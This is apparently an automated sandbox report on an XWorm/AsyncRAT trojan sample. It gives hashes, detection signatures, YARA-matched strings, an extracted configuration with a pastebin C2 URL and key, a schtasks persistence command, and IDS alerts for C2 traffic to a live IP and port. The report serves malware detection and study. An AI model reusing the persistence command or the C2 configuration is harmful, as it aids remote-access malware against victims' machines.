
Windows Analysis Report
XClient.exe

Overview

General Information

Sample name: XClient.exe
Analysis ID: 1583745
MD5: 2e525ccebf9ede7492931251eb66571a
SHA1: a0598bffa349759fb3dcf130cf93ed41a3c3d8f4
SHA256: fdefedd8f02446dd47723f4b1829f685f64e76b9d29002545dd4c5d5257eae29
Tags: AsyncRAT, exe, malware, trojan, user-Joker
Infos:

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • XClient.exe (PID: 6884 cmdline: "C:\Users\user\Desktop\XClient.exe" MD5: 2E525CCEBF9EDE7492931251EB66571A)
    • schtasks.exe (PID: 5968 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XClient.exe (PID: 2132 cmdline: C:\Users\user\AppData\Roaming\XClient.exe MD5: 2E525CCEBF9EDE7492931251EB66571A)
  • XClient.exe (PID: 5180 cmdline: C:\Users\user\AppData\Roaming\XClient.exe MD5: 2E525CCEBF9EDE7492931251EB66571A)
  • XClient.exe (PID: 3592 cmdline: C:\Users\user\AppData\Roaming\XClient.exe MD5: 2E525CCEBF9EDE7492931251EB66571A)
  • XClient.exe (PID: 6496 cmdline: C:\Users\user\AppData\Roaming\XClient.exe MD5: 2E525CCEBF9EDE7492931251EB66571A)
  • cleanup
{"C2 url": ["https://pastebin.com/raw/c8qJf1m5"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author | Strings
XClient.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
XClient.exe | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0x7211:$str01: $VB$Local_Port
  • 0x7202:$str02: $VB$Local_Host
  • 0x7445:$str03: get_Jpeg
  • 0x6f03:$str04: get_ServicePack
  • 0x8250:$str05: Select * from AntivirusProduct
  • 0x844c:$str06: PCRestart
  • 0x8460:$str07: shutdown.exe /f /r /t 0
  • 0x8512:$str08: StopReport
  • 0x84e8:$str09: StopDDos
  • 0x85de:$str10: sendPlugin
  • 0x877c:$str12: -ExecutionPolicy Bypass -File "
  • 0x88a1:$str13: Content-length: 5235
XClient.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x8c60:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8cfd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8e12:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x87bc:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\XClient.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Roaming\XClient.exe | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0x7211:$str01: $VB$Local_Port
  • 0x7202:$str02: $VB$Local_Host
  • 0x7445:$str03: get_Jpeg
  • 0x6f03:$str04: get_ServicePack
  • 0x8250:$str05: Select * from AntivirusProduct
  • 0x844c:$str06: PCRestart
  • 0x8460:$str07: shutdown.exe /f /r /t 0
  • 0x8512:$str08: StopReport
  • 0x84e8:$str09: StopDDos
  • 0x85de:$str10: sendPlugin
  • 0x877c:$str12: -ExecutionPolicy Bypass -File "
  • 0x88a1:$str13: Content-length: 5235
C:\Users\user\AppData\Roaming\XClient.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x8c60:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8cfd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8e12:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x87bc:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
00000000.00000000.1658447422.0000000000212000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000000.1658447422.0000000000212000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x8a60:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8afd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8c12:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x85bc:$cnc4: POST / HTTP/1.1
00000000.00000002.4114219369.00000000025CC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
Process Memory Space: XClient.exe PID: 6884 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Source | Rule | Description | Author | Strings
0.0.XClient.exe.210000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.0.XClient.exe.210000.0.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0x7211:$str01: $VB$Local_Port
  • 0x7202:$str02: $VB$Local_Host
  • 0x7445:$str03: get_Jpeg
  • 0x6f03:$str04: get_ServicePack
  • 0x8250:$str05: Select * from AntivirusProduct
  • 0x844c:$str06: PCRestart
  • 0x8460:$str07: shutdown.exe /f /r /t 0
  • 0x8512:$str08: StopReport
  • 0x84e8:$str09: StopDDos
  • 0x85de:$str10: sendPlugin
  • 0x877c:$str12: -ExecutionPolicy Bypass -File "
  • 0x88a1:$str13: Content-length: 5235
0.0.XClient.exe.210000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x8c60:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8cfd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8e12:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x87bc:$cnc4: POST / HTTP/1.1

System Summary

Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\XClient.exe, ProcessId: 6884, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\XClient.exe", ParentImage: C:\Users\user\Desktop\XClient.exe, ParentProcessId: 6884, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe", ProcessId: 5968, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-03T14:07:19.356985+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:07:26.053811+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:07:32.199336+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:07:45.057721+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:07:55.943481+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:07:57.899617+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:07.931512+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:08.429735+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:18.960693+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:19.225076+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:19.225960+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:19.312128+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:19.358606+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:19.477694+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:25.839737+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:25.963366+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:29.322721+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:29.409395+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:29.503593+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:29.597019+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:34.622947+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:34.716125+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:34.809161+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:34.894946+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:34.989565+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:35.084120+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:47.867467+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:48.601585+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:49.289059+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:50.461112+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:50.551238+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:50.644750+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:50.723432+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:53.336467+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:54.930018+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:55.851922+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:55.981477+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:58.211406+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:01.136759+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:06.476691+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:11.325602+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:13.336525+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:13.436101+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:20.229781+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:21.476571+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:21.576018+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:25.399402+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:25.944410+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:27.337864+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:27.338032+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:37.382583+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:37.699959+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:38.299166+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:47.195629+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:47.555250+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:52.648936+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:52.944630+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:55.941742+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:02.589170+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:03.048695+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:03.141843+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:13.195539+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:13.322235+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:13.415532+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:22.664732+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:24.610608+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:25.942800+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:34.711534+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:34.809849+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:34.903054+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:34.995921+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:35.088920+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:45.120046+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:45.213398+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:45.310161+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:45.403174+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:50.826218+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:50.920411+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:51.013312+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:51.106485+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:55.246273+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:55.942781+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:56.325098+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:59.308022+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:11:00.870752+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-03T14:07:19.383879+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:07:32.200994+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:07:45.119776+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:07:57.900946+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:07.937369+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:08.431252+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:18.962533+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:19.314165+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:19.361315+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:19.479640+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:25.847864+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:29.328176+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:29.411984+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:29.505485+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:29.603256+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:34.624385+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:34.717433+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:34.810988+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:34.896488+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:34.991018+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:35.085619+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:35.178907+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:35.184981+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:47.869276+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:48.602944+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:49.297369+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:50.464486+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:50.552997+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:50.646220+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:50.725396+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:50.802939+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:50.897646+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:50.902763+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:50.995663+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:51.007122+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:51.088767+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:51.093644+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:53.342240+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
